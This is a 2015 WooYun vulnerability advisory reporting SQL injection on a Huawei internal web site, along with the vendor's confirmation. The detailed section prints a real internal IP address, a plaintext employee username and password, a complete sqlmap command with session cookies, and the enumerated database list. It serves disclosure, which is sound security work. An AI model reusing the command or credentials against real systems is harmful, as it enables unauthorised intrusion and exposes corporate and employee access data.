当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142446

漏洞标题:华为某内部站点SQL注入(附内部账号一枚)

相关厂商:华为技术有限公司

漏洞作者: hecate

提交时间:2015-09-20 22:19

修复时间:2015-11-05 16:12

公开时间:2015-11-05 16:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-20: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

没错,我又来了

详细说明:

地址 http://119.145.9.199:8000
需要员工账号登录才能访问
账号 z00175628
密码 huawei@123

sqlmap -u "http://119.145.9.199:8000/getInfo" --data "type=BSS&dataType=Demonstrations&selectType=4&isInitDataType=3&dataTypeTypeStat=3&curType=business" --cookie="JSESSIONID=748CD4CA19AE180591609AD536227912; SSCSum=2; MYJSESSIONID=748CD4CA19AE180591609AD536227912; USERNAME=z00175628; USERINFO=z00175628; CLIENT=windows; DLPATH=http%3A//xpa.huawei.com/; IndexAdCookie=http%3A//xpa.huawei.com//bigfile/1440x3761393042821625718.jpg%2Chttp%3A//xpa.huawei.com/img/1440x3761393043296125731.jpg%2Chttp%3A//xpa.huawei.com/img/ad_21375667948093143.jpg%2Chttp%3A//xpa.huawei.com//bigfile/adver/image/banner1375784854109521.jpg; IndexAdLinkCookie=XPressPC.html%2Chttp%3A//xpa.huawei.com/newContentDetails.html%3Fid%3D201401200082367%23conTag%2Chttp%3A//xpa.huawei.com/XPAD.html%2C/AppDownLoadDetail.html%3Fsoftware.id%3D201307270025630; menuA=3; PAGENUM=10" -p "dataType"


injection.png


available databases [26]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] STATIST
[*] STATIST2
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] XPAONLINE


injection3_meitu_1.jpg


后台未授权访问

后台.png


后台2.png


然并卵……

漏洞证明:

修复方案:

过滤,上WAF

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-21 16:10

厂商回复:

感谢hecate对华为公司安全的关注,我们已经通知相关项目组修复该漏洞,并通知了相关人员修改密码。

最新状态:

暂无